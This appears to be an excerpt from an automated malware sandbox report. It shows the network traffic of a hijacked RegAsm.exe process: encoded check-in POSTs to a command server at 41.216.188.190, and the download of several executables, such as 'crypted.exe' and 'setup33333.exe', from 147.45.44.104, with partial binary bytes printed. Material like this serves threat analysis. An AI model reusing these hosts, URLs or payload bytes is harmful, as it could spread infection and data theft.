                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560237885 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.560237885 CEST1.1.1.1192.168.2.90xa614No error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.94970641.216.188.190807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:01.256000042 CEST204OUTGET /api/wp-ping.php HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 41.216.188.190
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:01.969233990 CEST259INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:01 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Data Raw: 66 69 73 68 31 35
                                                                                                                                                                                                                                        Data Ascii: fish15
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:05.728488922 CEST276OUTPOST /api/wp-admin.php HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 133
                                                                                                                                                                                                                                        Host: 41.216.188.190
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:05.728488922 CEST133OUTData Raw: 64 61 74 61 3d 4d 6f 54 5f 44 74 6d 4d 4f 30 2d 61 53 66 65 76 2d 56 6d 50 63 34 54 6d 4a 2d 6b 57 35 56 68 52 78 63 4e 45 69 2d 42 46 5a 50 73 73 68 73 57 6b 41 35 58 59 55 62 51 57 73 57 5f 32 72 50 6e 4a 41 76 4f 51 41 2d 72 33 2d 65 68 66 51
                                                                                                                                                                                                                                        Data Ascii: data=MoT_DtmMO0-aSfev-VmPc4TmJ-kW5VhRxcNEi-BFZPsshsWkA5XYUbQWsW_2rPnJAvOQA-r3-ehfQOSiqiXVuJrTMI4EoDyjAD2W99qR4U1QNbaVwdfX_NeBMiEpg8t0
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:06.375173092 CEST362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:05 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                        Content-Length: 108
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Data Raw: 34 4a 37 6d 4e 57 41 4f 49 6f 71 30 68 61 44 36 74 48 2b 35 4c 46 37 71 70 46 38 6b 33 33 6c 6e 6f 59 53 35 73 4c 76 49 5a 59 51 6e 2f 4e 77 42 56 43 69 49 30 4e 74 57 50 54 4c 30 45 32 4b 5a 63 4b 6a 6f 34 78 47 6b 71 73 37 7a 30 34 33 68 41 64 76 32 64 68 56 53 45 58 6c 6e 50 35 2b 6e 76 6c 66 46 68 68 71 64 5a 43 55 3d
                                                                                                                                                                                                                                        Data Ascii: 4J7mNWAOIoq0haD6tH+5LF7qpF8k33lnoYS5sLvIZYQn/NwBVCiI0NtWPTL0E2KZcKjo4xGkqs7z043hAdv2dhVSEXlnP5+nvlfFhhqdZCU=
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:06.502520084 CEST276OUTPOST /api/wp-admin.php HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 133
                                                                                                                                                                                                                                        Host: 41.216.188.190
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:06.502520084 CEST133OUTData Raw: 64 61 74 61 3d 7a 42 6a 49 6f 43 68 4b 38 32 4e 6a 45 37 43 37 44 46 58 71 42 35 66 72 73 76 50 73 69 4f 6f 59 46 55 46 57 49 52 6d 5f 58 6c 55 7a 68 67 68 39 71 51 52 5f 30 42 4a 54 4a 6d 77 76 58 65 39 38 2d 6c 4f 56 71 6e 4c 44 45 54 62 68 61
                                                                                                                                                                                                                                        Data Ascii: data=zBjIoChK82NjE7C7DFXqB5frsvPsiOoYFUFWIRm_XlUzhgh9qQR_0BJTJmwvXe98-lOVqnLDETbhaI13EJCUKrZ2iGxaRHSo-wl9hz2UJxEh5Q4S9InkXOBg2d9WSVnZ
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:07.555862904 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:06 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                        Content-Length: 2368
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Data Raw: 6d 76 7a 4b 64 5a 43 31 69 77 59 45 34 4e 45 50 4f 43 75 43 32 53 51 55 6d 51 73 4d 43 53 63 2b 41 30 4c 6f 58 52 4c 52 30 44 62 69 30 4e 62 43 76 53 59 53 31 70 36 46 6f 56 42 68 31 66 31 4e 4d 67 6f 48 54 77 53 65 7a 74 48 43 6e 50 34 35 72 54 78 73 32 45 39 33 52 47 4f 5a 38 66 4a 4d 37 77 63 34 50 4d 54 79 79 6b 68 45 5a 4e 64 4e 47 34 63 51 6a 36 61 44 57 50 37 57 47 32 6b 6e 67 61 38 6c 2b 6c 59 62 4a 7a 41 48 72 37 6b 6d 4a 77 73 65 52 4d 46 30 6f 4f 48 58 45 6d 5a 46 46 69 48 6d 2b 52 56 73 67 6f 56 4a 41 47 6f 5a 71 79 75 4f 2b 61 37 65 35 66 37 37 61 30 74 43 48 55 52 75 75 66 6f 6c 70 69 71 48 42 76 34 2f 4e 74 42 39 58 44 66 4e 4b 55 71 78 35 61 56 62 63 4f 47 38 2f 5a 45 67 2b 63 2f 45 38 6c 4f 47 35 73 2b 59 42 50 4a 61 6a 48 38 4a 63 74 4e 37 74 6e 61 44 50 47 75 56 57 37 6f 4f 33 73 78 6a 42 61 6e 41 65 52 46 2f 33 37 71 4c 6f 57 76 69 57 74 4d 6e 71 74 53 54 51 6e 41 32 58 4c 2f 6d 6e 6a 42 44 53 41 5a 70 4a 64 6c 50 7a 31 72 37 41 4e 6a 4e 35 79 6d 48 39 2f 42 75 43 34 35 75 6f 57 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: mvzKdZC1iwYE4NEPOCuC2SQUmQsMCSc+A0LoXRLR0Dbi0NbCvSYS1p6FoVBh1f1NMgoHTwSeztHCnP45rTxs2E93RGOZ8fJM7wc4PMTyykhEZNdNG4cQj6aDWP7WG2knga8l+lYbJzAHr7kmJwseRMF0oOHXEmZFFiHm+RVsgoVJAGoZqyuO+a7e5f77a0tCHURuufolpiqHBv4/NtB9XDfNKUqx5aVbcOG8/ZEg+c/E8lOG5s+YBPJajH8JctN7tnaDPGuVW7oO3sxjBanAeRF/37qLoWviWtMnqtSTQnA2XL/mnjBDSAZpJdlPz1r7ANjN5ymH9/BuC45uoWFBZdsd2ylUoPdEbfz0Pe/wStaYZShjt8mhG+XSCrFGxIWGaI6E1BAtsUILJ6V3817zmfcMS2/kn0aOkAwTjD3qh5pdQaNKyljxMfLjjIrW/EVEYjg3/i4S4GPhheqbhPaWeNLIUIImqj9BXHN8eBDZkPEImy+uipI2x+40DZ1ZjmGa8jiTNRlOUTCn0LT0ZcfB1/VV1Z+zsVP2TvEcTl9hqpF5Wg7ua0+X/npmhuOL58kdmiidPh8Y7yW8+1pIvAc5PXuSJNbwrkWctKWzWIFMlQu9xo5QacHOdwMe5y662BqRMGYIWdDg4Eb+qR/RvTi5OM43wmqgCiU+3qzCv8lfZ05508IBIamK8ZXLC7Ae8UxuUJkTUSDupKQvSjmuZwn8pNlUuT5wx5DVNEe+kCfFiv3FmDEYSiI4Xucz8he7q/tE9bpmpRYFYeg/D0ajEB+LumUbi9kTR5o3uhUb7Y7NXmYO432z4WVqNbZalOcbdlIm1GlLdx6tDFq3qGl/LeDWWz1Exy1zEtePnWhQvFUiPOZGfad2Y94NVJ+0k9rBca4UcY6xUWja02GxCVt8SB1sB/11PHNjFs4LSIT1rScjIFUvGfH72Z7W/mPsVZVkeZCLuJCkp/myg987m7ndlirq0
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:07.555888891 CEST1236INData Raw: 33 6c 48 57 63 6b 65 61 4f 37 41 7a 57 42 56 61 4c 54 32 6b 57 4b 47 57 52 79 77 4e 4e 62 67 41 63 76 4d 52 65 61 33 49 6e 6f 50 30 4b 57 4e 6d 66 38 76 63 64 71 46 49 32 6d 6f 48 46 55 30 59 6f 34 6c 58 4b 43 66 57 67 50 46 64 2f 50 52 49 45 77
                                                                                                                                                                                                                                        Data Ascii: 3lHWckeaO7AzWBVaLT2kWKGWRywNNbgAcvMRea3InoP0KWNmf8vcdqFI2moHFU0Yo4lXKCfWgPFd/PRIEwXK6R0ZwlyInuQzoM5b8dTAOG1heQw8Jo5pXL2OMboh7Tg/8xzZ10ZwtizM+rxvz0e/FrWBf5W1shjRw91MoIOJsA9M7q5cFxiDt4umiykIHDw78ea5/oZhdL2y2nZS8VweBsTBeJ/I3uBU/mBi5q0ftLr0m5XZCLa
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:07.555906057 CEST151INData Raw: 58 49 34 37 38 4f 46 52 4d 4c 68 54 43 55 4b 2b 75 4a 4c 50 66 74 34 32 47 49 51 45 70 49 55 6a 6e 70 31 6b 41 39 32 4a 4c 38 34 59 6b 6c 5a 42 59 2b 2b 4c 37 6e 54 31 65 6b 31 36 77 4b 64 36 35 64 45 69 38 42 6e 39 57 66 44 55 72 73 69 50 30 44
                                                                                                                                                                                                                                        Data Ascii: XI478OFRMLhTCUK+uJLPft42GIQEpIUjnp1kA92JL84YklZBY++L7nT1ek16wKd65dEi8Bn9WfDUrsiP0DAJILF7nyJxR4B5eOoCKPQLarHPx4oMnW3WB2La29US65JRK3oX/mrT4Pcw1E1S9QjB1B5


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.2.949709147.45.44.104807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.254848957 CEST217OUTHEAD /prog/66e705d09b33c_jack.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.841861010 CEST311INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:08 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 4249600
                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Sep 2024 16:05:36 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66e705d0-40d800"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.842827082 CEST238OUTHEAD /yuop/66eea6336b153_app16540406983468141987.exe#1 HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.024888992 CEST309INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:08 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 331640
                                                                                                                                                                                                                                        Last-Modified: Sat, 21 Sep 2024 10:55:47 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66eea633-50f78"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.025619984 CEST224OUTHEAD /yuop/66edb89bc4073_crypted.exe#xin HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.208009958 CEST309INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:09 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 361336
                                                                                                                                                                                                                                        Last-Modified: Fri, 20 Sep 2024 18:02:03 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66edb89b-58378"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.208270073 CEST217OUTHEAD /yuop/66ed9885d9aee_Day2.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.391180992 CEST311INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:09 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 3141632
                                                                                                                                                                                                                                        Last-Modified: Fri, 20 Sep 2024 15:45:09 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66ed9885-2ff000"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.391463041 CEST227OUTGET /yuop/66ee79315857f_setup33333.exe#lyla HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.573689938 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:09 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 418816
                                                                                                                                                                                                                                        Last-Modified: Sat, 21 Sep 2024 07:43:45 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66ee7931-66400"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d ba df d9 09 db b1 8a 09 db b1 8a 09 db b1 8a 66 ad 1a 8a 1b db b1 8a 66 ad 2f 8a 06 db b1 8a 66 ad 1b 8a 5c db b1 8a 00 a3 22 8a 02 db b1 8a 09 db b0 8a 86 db b1 8a 66 ad 1e 8a 08 db b1 8a 66 ad 2b 8a 08 db b1 8a 66 ad 2c 8a 08 db b1 8a 52 69 63 68 09 db b1 8a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 f6 25 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 48 03 00 00 b4 04 02 00 00 00 00 7e 3e 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 07 02 00 04 00 00 c5 b4 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Mff/f\"ff+f,RichPEL%dH~>`@JxLK*@$.textjGH `.data`ZL@.rsrc@@
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.573700905 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: pSZSNS<S*S|SN N8NLNfNNNNNNNOOO.O@OTOdOzOOOOOOOP"P0PJPZP
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.573710918 CEST1236INData Raw: 00 6f 00 66 00 20 00 63 00 61 00 6c 00 6c 00 69 00 6e 00 67 00 20 00 61 00 6e 00 20 00 4d 00 53 00 49 00 4c 00 2d 00 63 00 6f 00 6d 00 70 00 69 00 6c 00 65 00 64 00 20 00 28 00 2f 00 63 00 6c 00 72 00 29 00 20 00 66 00 75 00 6e 00 63 00 74 00 69
                                                                                                                                                                                                                                        Data Ascii: of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.R6032- not enough space for l
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.573772907 CEST1236INData Raw: 00 74 00 65 00 64 00 20 00 6d 00 75 00 6c 00 74 00 69 00 74 00 68 00 72 00 65 00 61 00 64 00 20 00 6c 00 6f 00 63 00 6b 00 20 00 65 00 72 00 72 00 6f 00 72 00 0d 00 0a 00 00 00 00 00 00 00 00 00 52 00 36 00 30 00 31 00 36 00 0d 00 0a 00 2d 00 20
                                                                                                                                                                                                                                        Data Ascii: ted multithread lock errorR6016- not enough space for thread dataR6010- abort() has been calledR6009-
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.573786020 CEST896INData Raw: 00 73 00 73 00 00 00 00 00 64 00 64 00 64 00 64 00 2c 00 20 00 4d 00 4d 00 4d 00 4d 00 20 00 64 00 64 00 2c 00 20 00 79 00 79 00 79 00 79 00 00 00 4d 00 4d 00 2f 00 64 00 64 00 2f 00 79 00 79 00 00 00 00 00 50 00 4d 00 00 00 00 00 41 00 4d 00 00
                                                                                                                                                                                                                                        Data Ascii: ssdddd, MMMM dd, yyyyMM/dd/yyPMAMDecemberNovemberOctoberSeptemberAugustJulyJuneAprilMarchFebruary
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.573822975 CEST1236INData Raw: 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 00 c8 c2 43 00 20 c3 43 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: <=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~C C
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.573839903 CEST1236INData Raw: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 10 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.573930979 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 46 00 00 20 6b 00 00 b0 8a 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: F k4UH\E@EmCSEmCV3EWEMumC]EmC?EE EEEDMuD@.
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.573941946 CEST1236INData Raw: a1 20 fb 44 02 8a 84 38 4b 13 01 00 8b 0d 74 e7 44 02 88 04 39 81 3d e4 ec 44 02 90 04 00 00 75 3f 56 56 8d 45 fc 50 ff 15 2c 10 40 00 56 56 ff 15 10 10 40 00 56 56 56 56 ff 15 f0 10 40 00 56 56 56 ff 15 d0 10 40 00 8d 45 f4 50 56 8d 45 e0 50 56
                                                                                                                                                                                                                                        Data Ascii: D8KtD9=Du?VVEP,@VV@VVVV@VVV@EPVEPV@VV@G;=Dr3D=u*VPVVVV@V@VV(@VVV@G|3V@auuE<EtDGt|j{_=DuQV`@V
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.573952913 CEST1236INData Raw: b8 5b 11 c0 04 f7 65 e0 8b 45 e0 81 6d 98 3d 26 d9 07 b8 99 ee 68 60 f7 a5 7c ff ff ff 8b 85 7c ff ff ff 81 6d ec 16 8f 4d 4c 81 ad 44 ff ff ff 06 b8 8f 6f 81 6d a0 f4 53 2c 42 b8 c8 3c 68 23 f7 a5 74 ff ff ff 8b 85 74 ff ff ff 81 85 44 ff ff ff
                                                                                                                                                                                                                                        Data Ascii: [eEm=&h`||mMLDomS,B<h#ttD~m:H)<<]44Whhm]ll<"eEE'lS<Zvlcd/5K&=eEx
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.574527979 CEST552INData Raw: cc 57 8b 7c 24 08 eb 6e 8d a4 24 00 00 00 00 8b ff 8b 4c 24 04 57 f7 c1 03 00 00 00 74 13 8a 01 83 c1 01 84 c0 74 3d f7 c1 03 00 00 00 75 ef 8b ff 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 23 84 e4
                                                                                                                                                                                                                                        Data Ascii: W|$n$L$Wtt=u~3tAt#tttyyyyL$ttfu~3tt4t'ttD$_fD$G_fD$_
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.107702017 CEST237OUTGET /yuop/66eea6336b153_app16540406983468141987.exe#1 HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.468923092 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:10 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 331640
                                                                                                                                                                                                                                        Last-Modified: Sat, 21 Sep 2024 10:55:47 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66eea633-50f78"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3d a1 ee 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 08 00 00 00 00 00 00 5e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 fb 04 00 53 00 00 00 00 00 05 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 e6 04 00 78 29 00 00 00 20 05 00 0c 00 00 00 d0 f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=f^ @ @`Sx) H.textd `.rsrc@@.reloc @B@H6Z9)^jPtY#AR\d47Z&ww|5':T*~xT7MwSaQpRtuqzD(&4 :OdV[ clprK]vY\_{'T-favw(Hn]gpj)OKVqQ*yP!Y;O.0@yt"u7nB=C^=Mi4b~td.#Xa`I\R!'}>}XJ
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.498991013 CEST219OUTGET /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.681965113 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:10 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 11496960
                                                                                                                                                                                                                                        Last-Modified: Wed, 18 Sep 2024 05:25:37 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66ea6451-af6e00"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
